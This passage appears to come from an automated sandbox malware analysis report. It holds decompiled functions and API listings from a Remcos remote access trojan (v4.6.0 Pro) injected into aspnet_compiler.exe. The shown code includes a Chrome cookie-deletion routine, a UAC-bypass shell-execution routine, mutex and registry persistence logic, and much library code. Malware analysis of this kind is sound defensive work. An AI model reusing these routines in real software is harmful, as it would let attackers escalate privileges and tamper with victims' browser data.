							E00433DDC(__eflags, _t42);
							goto L5;
						}
					} else {
						_t42 = _t39;
						goto L5;
					}
				}
			}











                0x004106b3
                0x004106b8
                0x004106c3
                0x004106d4
                0x004106d8
                0x0041070c
                0x0041070f
                0x0041071b
                0x004106da
                0x004106dc
                0x004106f0
                0x004106f3
                0x0041071c
                0x0041071f
                0x0041072d
                0x00410732
                0x00410733
                0x00410738
                0x0041073a
                0x0041073f
                0x00410748
                0x004106f5
                0x004106f5
                0x004106fa
                0x00410702
                0x00410706
                0x00000000
                0x0041070b
                0x004106de
                0x004106de
                0x00000000
                0x004106de
                0x004106dc

                APIs
                • std::_Lockit::_Lockit.LIBCPMT ref: 004106B3
                • int.LIBCPMT ref: 004106C6
                  • Part of subcall function 0040D5C5: std::_Lockit::_Lockit.LIBCPMT ref: 0040D5D6
                  • Part of subcall function 0040D5C5: std::_Lockit::~_Lockit.LIBCPMT ref: 0040D5F0
                • std::_Facet_Register.LIBCPMT ref: 00410706
                • std::_Lockit::~_Lockit.LIBCPMT ref: 0041070F
                • __CxxThrowException@8.LIBVCRUNTIME ref: 0041072D
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                • String ID: hLG
                • API String ID: 2536120697-233936816
                • Opcode ID: fe1dd14917883f67ba224efd1dee7036d7affe31d0fcfbb40d479355fe81f6d9
                • Instruction ID: 7c3c20e224a2a00f7f7be6237b00d9c90688f6040d3be4d1753458cdbc359952
                • Opcode Fuzzy Hash: fe1dd14917883f67ba224efd1dee7036d7affe31d0fcfbb40d479355fe81f6d9
                • Instruction Fuzzy Hash: 96110A32900218ABCB11FBE5C8418DEBB689F84724F11056FF815672D1DF78AE85CBD8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00438C57 Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 95%
                			E00438C57(void* __ecx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t25;
				void* _t28;

				if( *0x46f090 != 0xffffffff) {
					_t25 = GetLastError();
					_t11 = E004376D8(__eflags,  *0x46f090);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E00437712(__eflags,  *0x46f090, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_t28 = E004443F4(_t16, 1, 0x28);
								__eflags = _t28;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00437712(__eflags,  *0x46f090, 0);
								} else {
									__eflags = E00437712(__eflags,  *0x46f090, _t28);
									if(__eflags != 0) {
										_t11 = _t28;
										_t28 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E00445002(_t28);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t25);
					return _t11;
				} else {
					return 0;
				}
			}








                0x00438c5e
                0x00438c71
                0x00438c78
                0x00438c7b
                0x00438c7e
                0x00438c97
                0x00438c97
                0x00438c80
                0x00438c80
                0x00438c82
                0x00438c8c
                0x00438c92
                0x00438c93
                0x00438c95
                0x00438ca5
                0x00438ca9
                0x00438cab
                0x00438cbf
                0x00438cbf
                0x00438cc8
                0x00438cad
                0x00438cbb
                0x00438cbd
                0x00438cd1
                0x00438cd3
                0x00438cd3
                0x00000000
                0x00000000
                0x00000000
                0x00438cbd
                0x00438cd6
                0x00000000
                0x00000000
                0x00000000
                0x00438c95
                0x00438c82
                0x00438cde
                0x00438ce8
                0x00438c60
                0x00438c62
                0x00438c62

                APIs
                • GetLastError.KERNEL32(?,?,00438C4E,00437B8E), ref: 00438C65
                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00438C73
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00438C8C
                • SetLastError.KERNEL32(00000000,?,00438C4E,00437B8E), ref: 00438CDE
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLastValue___vcrt_
                • String ID:
                • API String ID: 3852720340-0
                • Opcode ID: 06d2b6d0d256db09040b2198e32479e012de82d5718a97fd6b90c10f44b40caa
                • Instruction ID: 21f9491cf859890c7eadaa784ea30681ac294a37727d4d336c6cdb78a7d4fc19
                • Opcode Fuzzy Hash: 06d2b6d0d256db09040b2198e32479e012de82d5718a97fd6b90c10f44b40caa
                • Instruction Fuzzy Hash: 7001F73220E7126FE6242B797C86A2B6744DB09779F20323FF624456E2FF594C09726D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406C24 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                Download Yara Rule
                APIs
                • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe), ref: 00406C44
                  • Part of subcall function 00406B71: _wcslen.LIBCMT ref: 00406B95
                  • Part of subcall function 00406B71: CoGetObject.OLE32(?,00000024,004644E0,00000000), ref: 00406BF6
                • CoUninitialize.OLE32 ref: 00406C9D
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: InitializeObjectUninitialize_wcslen
                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                • API String ID: 3851391207-1062857032
                • Opcode ID: 21c6875a4e00bf3e9cd9c84db11fc7adaedb877f72474f7b3962a236dd4ca43a
                • Instruction ID: 4a2b0e9ada28304c15679dea14e35c8bbb0126878905a56f40071f2f2dcd1631
                • Opcode Fuzzy Hash: 21c6875a4e00bf3e9cd9c84db11fc7adaedb877f72474f7b3962a236dd4ca43a
                • Instruction Fuzzy Hash: 5D01C0723093116FF7246B52EC0AF3B7798DB8176AF16013FF946A61C1EAB9EC004169
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040B01B Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                Download Yara Rule
                C-Code - Quality: 82%
                			E0040B01B(void* __edx, void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				void* __ebx;
				void* __ebp;
				long _t18;
				void* _t20;
				void* _t21;
				void* _t28;
				void* _t32;
				void* _t33;
				void* _t34;

				_t37 = __eflags;
				_t32 = __edi;
				_t31 = E00402073(_t20,  &_v52, __edx, _t33, E0043A9AA(_t20, __eflags, "UserProfile"));
				E00408832(_t20,  &_v28, _t7, _t32, _t33, _t37, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies");
				E00401FB8();
				if(DeleteFileA(E00401F8B( &_v28)) != 0) {
					_t28 = _t34 - 0x18;
					_push("\n[Chrome Cookies found, cleared!]");
					goto L6;
				} else {
					_t18 = GetLastError();
					if(_t18 == 0 || _t18 == 1) {
						_t28 = _t34 - 0x18;
						_push("\n[Chrome Cookies not found]");
						L6:
						E00402073(_t20, _t28, _t31, _t33);
						E0040B752(_t20, _t31, _t33, __eflags);
						_t21 = 1;
					} else {
						_t21 = 0;
					}
				}
				E00401FB8();
				return _t21;
			}














                0x0040b01b
                0x0040b01b
                0x0040b03b
                0x0040b040
                0x0040b049
                0x0040b05f
                0x0040b085
                0x0040b087
                0x00000000
                0x0040b061
                0x0040b068
                0x0040b06b
                0x0040b079
                0x0040b07b
                0x0040b08c
                0x0040b08c
                0x0040b091
                0x0040b096
                0x0040b072
                0x0040b072
                0x0040b072
                0x0040b06b
                0x0040b09e
                0x0040b0a9

                APIs
                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B057
                • GetLastError.KERNEL32 ref: 0040B061
                Strings
                • [Chrome Cookies found, cleared!], xrefs: 0040B087
                • [Chrome Cookies not found], xrefs: 0040B07B
                • UserProfile, xrefs: 0040B027
                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B022
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: DeleteErrorFileLast
                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                • API String ID: 2018770650-304995407
                • Opcode ID: ccdb3e1c20e372875c48605d81a56ec54d8c08013769e4607f37cdedbea4537f
                • Instruction ID: f9fbcf48e46e0b37629b78e1018d25b522eb7a253e11c313dbfba25adce049df
                • Opcode Fuzzy Hash: ccdb3e1c20e372875c48605d81a56ec54d8c08013769e4607f37cdedbea4537f
                • Instruction Fuzzy Hash: FE01F271AC410666CA0476B5DD5BCBFBB28E951308B40027FF842721E2FF7A490586CF
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0041B6A6 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 70%
                			E0041B6A6(void* __ebx, void* __ecx, void* __edx, void* __edi) {
				char _v104;
				struct HWND__* _t7;
				void* _t24;
				void* _t28;

				_t28 = __edi;
				_t26 = __ecx;
				_t24 = __ecx;
				AllocConsole();
				_t7 =  *0x472b0c(__ebx);
				_t32 = _t24;
				 *0x472b10 = _t7;
				if(_t24 == 0) {
					ShowWindow(_t7, 0);
				}
				E004404F2(_t26, "CONOUT$", "a", E0043AA88(1));
				SetConsoleOutputCP(0x4e4);
				E0041B663();
				E00435760(_t28,  &_v104, 0, 0x64);
				E00440830( &_v104, "\n\tRemcos v");
				E00440830( &_v104, "4.6.0 Pro");
				E00440830( &_v104, 0x46ae58);
				_push( &_v104);
				return E00406874(_t32);
			}







                0x0041b6a6
                0x0041b6a6
                0x0041b6ad
                0x0041b6af
                0x0041b6b5
                0x0041b6bb
                0x0041b6bd
                0x0041b6c3
                0x0041b6c8
                0x0041b6c8
                0x0041b6e0
                0x0041b6ed
                0x0041b6f3
                0x0041b700
                0x0041b70e
                0x0041b71c
                0x0041b72a
                0x0041b732
                0x0041b73e

                APIs
                • AllocConsole.KERNEL32(00473280), ref: 0041B6AF
                • ShowWindow.USER32(00000000,00000000), ref: 0041B6C8
                • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041B6ED
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Console$AllocOutputShowWindow
                • String ID: Remcos v$4.6.0 Pro$CONOUT$
                • API String ID: 2425139147-579393372
                • Opcode ID: 9fa98f7035d97c5e21b7ac84947d6802447a46aa1252a65f1097801335382c61
                • Instruction ID: db7634a49a328e0f99b2c2d62409033857a76ccc0adaf027dd828388b15aa78f
                • Opcode Fuzzy Hash: 9fa98f7035d97c5e21b7ac84947d6802447a46aa1252a65f1097801335382c61
                • Instruction Fuzzy Hash: B1012171A903086BE600FBB19D4BF9D33ACAB14705F501427B604A7192EABD9924CA6E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004068D4 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004068D4(void* __esi) {
				int _t5;
				void* _t7;
				void* _t8;
				void* _t13;
				void* _t20;

				_t20 =  *0x46f9d0 - 1; // 0x1
				if(_t20 != 0) {
					__eflags =  *0x46f9d0 - 1;
					if(__eflags != 0) {
						CloseHandle( *0x470d44);
						__eflags = E00406E2B(__eflags);
						if(__eflags == 0) {
							_t13 = 0x470b38;
						} else {
							_t13 = E00401EE4(0x473220);
						}
						_t5 = E00406CE1(_t13, 0x46a8f0, __eflags);
						__eflags = _t5;
						if(_t5 == 0) {
							ExitProcess(_t5);
						}
						_t7 = CreateMutexA(0, 1, E00401F8B(0x473268));
						 *0x470d44 = _t7;
						_t8 = 2;
						return _t8;
					} else {
						__eflags = 1;
						return 1;
					}
				} else {
					return 1;
				}
			}








                0x004068d7
                0x004068dd
                0x00406cfe
                0x00406d05
                0x00406d12
                0x00406d29
                0x00406d2b
                0x00406d38
                0x00406d2d
                0x00406d34
                0x00406d34
                0x00406d3d
                0x00406d43
                0x00406d45
                0x00406d48
                0x00406d48
                0x00406d5d
                0x00406d65
                0x00406d6a
                0x00406d6b
                0x00406d07
                0x00406d09
                0x00406d0a
                0x00406d0a
                0x004068e3
                0x004068e3
                0x004068e3

                Strings
                • h2G, xrefs: 00406D4E
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, xrefs: 00406D38
                • 2G, xrefs: 00406D18
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: 2G$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$h2G
                • API String ID: 0-4004919476
                • Opcode ID: c61ca4cb01cddf5c13da32d6100223f6d0b8265b2d1e1a0c3ddc6a0d86cef2f3
                • Instruction ID: 7dfc231a9bb00e149e5c0c7810f67d20ab7eac2a910a21db205252ecd238aa05
                • Opcode Fuzzy Hash: c61ca4cb01cddf5c13da32d6100223f6d0b8265b2d1e1a0c3ddc6a0d86cef2f3
                • Instruction Fuzzy Hash: AEF0F670706311EBDB102B70AD0926A2616EB40306F01447BF84BEA2E1EB7D8852965E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00412AFC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 39registryCOMMON
                Download Yara Rule
                C-Code - Quality: 82%
                			E00412AFC(void* __ecx, short* __edx, short* _a4, char _a8) {
				void* _v8;
				signed int _t16;
				char* _t18;
				long _t19;
				signed int _t21;
				signed int _t22;

				_push(__ecx);
				_push(_t21);
				_t1 =  &_v8; // 0x473220
				if(RegCreateKeyW(__ecx, __edx, _t1) != 0) {
					_t22 = 0;
				} else {
					_t16 = E0040245C();
					_t3 =  &_a8; // 0x40ed66
					_t18 = E00401EE4(_t3);
					_t7 =  &_v8; // 0x473220
					_t19 = RegSetValueExW( *_t7, _a4, 0, 1, _t18, 2 + _t16 * 2);
					RegCloseKey(_v8);
					_t22 = _t21 & 0xffffff00 | _t19 == 0x00000000;
				}
				E00401EE9();
				return _t22;
			}









                0x00412aff
                0x00412b00
                0x00412b01
                0x00412b0f
                0x00412b4e
                0x00412b11
                0x00412b15
                0x00412b1a
                0x00412b25
                0x00412b32
                0x00412b35
                0x00412b40
                0x00412b49
                0x00412b49
                0x00412b53
                0x00412b5e

                APIs
                • RegCreateKeyW.ADVAPI32(80000001,00000000, 2G), ref: 00412B07
                • RegSetValueExW.ADVAPI32( 2G,?,00000000,00000001,00000000,00000000,00473238,?,0040ED66,pth_unenc,00473220), ref: 00412B35
                • RegCloseKey.ADVAPI32(?,?,0040ED66,pth_unenc,00473220), ref: 00412B40
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseCreateValue
                • String ID: 2G$f@$pth_unenc
                • API String ID: 1818849710-3782201451
                • Opcode ID: 6190462d4d81e4473ec81c7f4ed76fee2d9c5a76ef708f5cda19a85617608406
                • Instruction ID: 0c8d3bccce686eec099df141ad345258a3ef415a4a3ae97405fd51eab9751fc6
                • Opcode Fuzzy Hash: 6190462d4d81e4473ec81c7f4ed76fee2d9c5a76ef708f5cda19a85617608406
                • Instruction Fuzzy Hash: 1CF0C231444218BBCF009FA1ED86FEE37ACEB00754F00412AB805A61A1E6759E04DA94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004393DC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                Download Yara Rule
                C-Code - Quality: 69%
                			E004393DC(void* __ebx, signed int __edx, void* __edi, void* _a4, signed int _a8) {
				intOrPtr _v0;
				char _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				char _v24;
				void* __esi;
				void* __ebp;
				signed int _t61;
				void* _t64;
				signed int _t67;
				signed int _t69;
				signed int _t70;
				signed int _t73;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				intOrPtr _t80;
				signed int _t81;
				void* _t82;
				signed int _t84;
				void* _t85;
				signed int _t87;
				signed int _t93;
				signed int _t102;
				void* _t104;
				signed int _t107;
				signed int* _t110;
				signed int* _t111;
				intOrPtr* _t113;
				signed int _t118;
				signed int _t120;
				signed int _t123;
				void* _t125;
				signed int _t128;
				signed int _t131;
				signed int _t139;
				signed int _t145;
				void _t147;
				void* _t148;
				void* _t150;
				void* _t152;
				signed int _t153;
				signed int _t154;
				void* _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				intOrPtr _t159;

				_t139 = __edx;
				_t155 = _a4;
				if(_t155 == 0) {
					_t113 = E0043EEAD();
					_t159 = 0x16;
					 *_t113 = _t159;
					E0043A5BB();
					return _t159;
				}
				_push(__edi);
				_t123 = 9;
				memset(_t155, _t61 | 0xffffffff, _t123 << 2);
				_t145 = _a8;
				__eflags = _t145;
				if(_t145 == 0) {
					_t111 = E0043EEAD();
					_t158 = 0x16;
					 *_t111 = _t158;
					E0043A5BB();
					_t78 = _t158;
					L12:
					return _t78;
				}
				_push(__ebx);
				__eflags =  *(_t145 + 4);
				if(__eflags <= 0) {
					if(__eflags < 0) {
						L10:
						_t110 = E0043EEAD();
						_t157 = 0x16;
						 *_t110 = _t157;
						_t78 = _t157;
						L11:
						goto L12;
					}
					__eflags =  *_t145;
					if( *_t145 < 0) {
						goto L10;
					}
				}
				_t64 = 7;
				__eflags =  *(_t145 + 4) - _t64;
				if(__eflags >= 0) {
					if(__eflags > 0) {
						goto L10;
					}
					__eflags =  *_t145 - 0x93406fff;
					if(__eflags > 0) {
						goto L10;
					}
				}
				E00447E20(0, _t145, _t155, __eflags);
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				_t67 = E00447655( &_v12);
				_pop(_t125);
				__eflags = _t67;
				if(_t67 == 0) {
					_t75 = E00447681( &_v16);
					_pop(_t125);
					__eflags = _t75;
					if(_t75 == 0) {
						_t77 = E004476AD( &_v8);
						_pop(_t125);
						__eflags = _t77;
						if(_t77 == 0) {
							_t118 =  *(_t145 + 4);
							_t128 =  *_t145;
							__eflags = _t118;
							if(__eflags < 0) {
								L28:
								_push(_t145);
								_push(_t155);
								_t78 = E00441327();
								__eflags = _t78;
								if(_t78 != 0) {
									goto L11;
								}
								__eflags = _v12;
								asm("cdq");
								_t147 =  *_t155;
								_t120 = _t139;
								if(__eflags == 0) {
									L32:
									_t80 = _v8;
									L33:
									asm("cdq");
									_t148 = _t147 - _t80;
									asm("sbb ebx, edx");
									_t81 = E00455EF0(_t148, _t120, 0x3c, 0);
									 *_t155 = _t81;
									__eflags = _t81;
									if(_t81 < 0) {
										_t148 = _t148 + 0xffffffc4;
										 *_t155 = _t81 + 0x3c;
										asm("adc ebx, 0xffffffff");
									}
									_t82 = E00455E40(_t148, _t120, 0x3c, 0);
									_t121 = _t139;
									_t28 = _t155 + 4; // 0x848d0046
									asm("cdq");
									_t150 = _t82 +  *_t28;
									asm("adc ebx, edx");
									_t84 = E00455EF0(_t150, _t139, 0x3c, 0);
									 *(_t155 + 4) = _t84;
									__eflags = _t84;
									if(_t84 < 0) {
										_t150 = _t150 + 0xffffffc4;
										 *(_t155 + 4) = _t84 + 0x3c;
										asm("adc ebx, 0xffffffff");
									}
									_t85 = E00455E40(_t150, _t121, 0x3c, 0);
									_t122 = _t139;
									_t31 = _t155 + 8; // 0xa824
									asm("cdq");
									_t152 = _t85 +  *_t31;
									asm("adc ebx, edx");
									_t87 = E00455EF0(_t152, _t139, 0x18, 0);
									 *(_t155 + 8) = _t87;
									__eflags = _t87;
									if(_t87 < 0) {
										_t152 = _t152 + 0xffffffe8;
										 *(_t155 + 8) = _t87 + 0x18;
										asm("adc ebx, 0xffffffff");
									}
									_t131 = E00455E40(_t152, _t122, 0x18, 0);
									__eflags = _t139;
									if(__eflags < 0) {
										L48:
										_t44 = _t155 + 0x18; // 0xa024848d
										 *(_t155 + 0xc) =  *(_t155 + 0xc) + _t131;
										asm("cdq");
										_t153 = 7;
										_t51 = _t155 + 0xc; // 0x50506a00
										_t93 =  *_t51;
										 *(_t155 + 0x18) = ( *_t44 + 7 + _t131) % _t153;
										__eflags = _t93;
										if(_t93 > 0) {
											goto L43;
										}
										 *((intOrPtr*)(_t155 + 0x10)) = 0xb;
										 *(_t155 + 0xc) = _t93 + 0x1f;
										_t55 = _t131 + 0x16d; // 0x16d
										 *(_t155 + 0x1c) =  *(_t155 + 0x1c) + _t55;
										 *((intOrPtr*)(_t155 + 0x14)) =  *((intOrPtr*)(_t155 + 0x14)) - 1;
										goto L44;
									} else {
										if(__eflags > 0) {
											L42:
											_t34 = _t155 + 0x18; // 0xa024848d
											asm("cdq");
											_t154 = 7;
											_t39 = _t155 + 0xc;
											 *_t39 =  *(_t155 + 0xc) + _t131;
											__eflags =  *_t39;
											 *(_t155 + 0x18) = ( *_t34 + _t131) % _t154;
											L43:
											_t42 = _t155 + 0x1c;
											 *_t42 =  *(_t155 + 0x1c) + _t131;
											__eflags =  *_t42;
											L44:
											_t78 = 0;
											goto L11;
										}
										__eflags = _t131;
										if(_t131 == 0) {
											__eflags = _t139;
											if(__eflags > 0) {
												goto L44;
											}
											if(__eflags < 0) {
												goto L48;
											}
											__eflags = _t131;
											if(_t131 >= 0) {
												goto L44;
											}
											goto L48;
										}
										goto L42;
									}
								}
								_push(_t155);
								_t102 = E00447E71(_t120, _t147, _t155, __eflags);
								__eflags = _t102;
								if(_t102 == 0) {
									goto L32;
								}
								_t80 = _v8 + _v16;
								 *((intOrPtr*)(_t155 + 0x20)) = 1;
								goto L33;
							}
							if(__eflags > 0) {
								L20:
								_t104 = 7;
								__eflags = _t118 - _t104;
								if(__eflags > 0) {
									goto L28;
								}
								if(__eflags < 0) {
									L23:
									asm("cdq");
									_push( &_v24);
									asm("sbb ebx, edx");
									_v24 = _t128 - _v8;
									_push(_t155);
									_v20 = _t118;
									_t78 = E00441327();
									__eflags = _t78;
									if(_t78 != 0) {
										goto L11;
									}
									__eflags = _v12 - _t78;
									if(__eflags == 0) {
										goto L44;
									}
									_push(_t155);
									_t107 = E00447E71(_t118, _t145, _t155, __eflags);
									__eflags = _t107;
									if(_t107 == 0) {
										goto L44;
									}
									asm("cdq");
									_v24 = _v24 - _v16;
									_push( &_v24);
									asm("sbb [ebp-0x10], edx");
									_push(_t155);
									_t78 = E00441327();
									__eflags = _t78;
									if(_t78 != 0) {
										goto L11;
									}
									 *((intOrPtr*)(_t155 + 0x20)) = 1;
									goto L44;
								}
								__eflags = _t128 - 0x933c7b7f;
								if(_t128 >= 0x933c7b7f) {
									goto L28;
								}
								goto L23;
							}
							__eflags = _t128 - 0x3f480;
							if(_t128 <= 0x3f480) {
								goto L28;
							}
							goto L20;
						}
					}
				}
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				E0043A5E8();
				asm("int3");
				_push(_t155);
				_t69 = E004412C2(_t125);
				_t156 = _t69;
				__eflags = _t156;
				if(_t156 != 0) {
					_push(_v0);
					_t70 = E004393DC(0, _t139, _t145, _t156);
					asm("sbb eax, eax");
					_t73 =  !( ~_t70) & _t156;
					__eflags = _t73;
					return _t73;
				}
				return _t69;
			}




















































                0x004393dc
                0x004393e5
                0x004393ea
                0x004393ec
                0x004393f3
                0x004393f4
                0x004393f6
                0x00000000
                0x004393fb
                0x004393ff
                0x00439407
                0x00439408
                0x0043940a
                0x0043940d
                0x0043940f
                0x00439411
                0x00439418
                0x00439419
                0x0043941b
                0x00439420
                0x00439451
                0x00000000
                0x00439451
                0x00439424
                0x00439427
                0x0043942a
                0x0043942c
                0x00439444
                0x00439444
                0x0043944b
                0x0043944c
                0x0043944e
                0x00439450
                0x00000000
                0x00439450
                0x0043942e
                0x00439430
                0x00000000
                0x00000000
                0x00439430
                0x00439434
                0x00439435
                0x00439438
                0x0043943a
                0x00000000
                0x00000000
                0x0043943c
                0x00439442
                0x00000000
                0x00000000
                0x00439442
                0x00439457
                0x0043945f
                0x00439463
                0x00439466
                0x00439469
                0x0043946e
                0x0043946f
                0x00439471
                0x0043947b
                0x00439480
                0x00439481
                0x00439483
                0x0043948d
                0x00439492
                0x00439493
                0x00439495
                0x0043949b
                0x0043949e
                0x004394a0
                0x004394a2
                0x00439523
                0x00439523
                0x00439524
                0x00439525
                0x0043952c
                0x0043952e
                0x00000000
                0x00000000
                0x00439534
                0x0043953a
                0x0043953b
                0x0043953d
                0x0043953f
                0x0043955b
                0x0043955b
                0x0043955e
                0x0043955e
                0x0043955f
                0x00439565
                0x00439569
                0x0043956e
                0x00439570
                0x00439572
                0x00439577
                0x0043957a
                0x0043957c
                0x0043957c
                0x00439585
                0x0043958c
                0x0043958e
                0x00439591
                0x00439592
                0x00439598
                0x0043959c
                0x004395a1
                0x004395a4
                0x004395a6
                0x004395ab
                0x004395ae
                0x004395b1
                0x004395b1
                0x004395ba
                0x004395c1
                0x004395c3
                0x004395c6
                0x004395c7
                0x004395cd
                0x004395d1
                0x004395d6
                0x004395d9
                0x004395db
                0x004395e0
                0x004395e3
                0x004395e6
                0x004395e6
                0x004395f4
                0x004395f6
                0x004395f8
                0x00439625
                0x00439625
                0x0043962b
                0x00439632
                0x00439633
                0x00439636
                0x00439636
                0x00439639
                0x0043963c
                0x0043963e
                0x00000000
                0x00000000
                0x00439643
                0x0043964a
                0x0043964d
                0x00439653
                0x00439656
                0x00000000
                0x004395fa
                0x004395fa
                0x00439600
                0x00439600
                0x00439607
                0x00439608
                0x0043960b
                0x0043960b
                0x0043960b
                0x0043960e
                0x00439611
                0x00439611
                0x00439611
                0x00439611
                0x00439614
                0x00439614
                0x00000000
                0x00439614
                0x004395fc
                0x004395fe
                0x0043961b
                0x0043961d
                0x00000000
                0x00000000
                0x0043961f
                0x00000000
                0x00000000
                0x00439621
                0x00439623
                0x00000000
                0x00000000
                0x00000000
                0x00439623
                0x00000000
                0x004395fe
                0x004395f8
                0x00439541
                0x00439542
                0x00439548
                0x0043954a
                0x00000000
                0x00000000
                0x0043954f
                0x00439552
                0x00000000
                0x00439552
                0x004394a4
                0x004394ae
                0x004394b0
                0x004394b1
                0x004394b3
                0x00000000
                0x00000000
                0x004394b5
                0x004394bf
                0x004394c2
                0x004394c8
                0x004394c9
                0x004394cb
                0x004394ce
                0x004394cf
                0x004394d2
                0x004394d9
                0x004394db
                0x00000000
                0x00000000
                0x004394e1
                0x004394e4
                0x00000000
                0x00000000
                0x004394ea
                0x004394eb
                0x004394f1
                0x004394f3
                0x00000000
                0x00000000
                0x004394fc
                0x004394fd
                0x00439503
                0x00439504
                0x00439507
                0x00439508
                0x0043950f
                0x00439511
                0x00000000
                0x00000000
                0x00439517
                0x00000000
                0x00439517
                0x004394b7
                0x004394bd
                0x00000000
                0x00000000
                0x00000000
                0x004394bd
                0x004394a6
                0x004394ac
                0x00000000
                0x00000000
                0x00000000
                0x004394ac
                0x00439495
                0x00439483
                0x0043965b
                0x0043965c
                0x0043965d
                0x0043965e
                0x0043965f
                0x00439660
                0x00439665
                0x0043966b
                0x0043966c
                0x00439671
                0x00439673
                0x00439675
                0x00439677
                0x0043967b
                0x00439683
                0x00439688
                0x00439688
                0x00000000
                0x00439688
                0x0043968c

                APIs
                • __allrem.LIBCMT ref: 00439569
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00439585
                • __allrem.LIBCMT ref: 0043959C
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004395BA
                • __allrem.LIBCMT ref: 004395D1
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004395EF
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                • String ID:
                • API String ID: 1992179935-0
                • Opcode ID: 1dddf8e515139d97c6967afe93bbf2e1bd56be1d0b4091d9d2e71436e447a3a3
                • Instruction ID: e4b6510059702768e302587ffc0a9b2f327eb02b25cf372d85322d71f2147457
                • Opcode Fuzzy Hash: 1dddf8e515139d97c6967afe93bbf2e1bd56be1d0b4091d9d2e71436e447a3a3
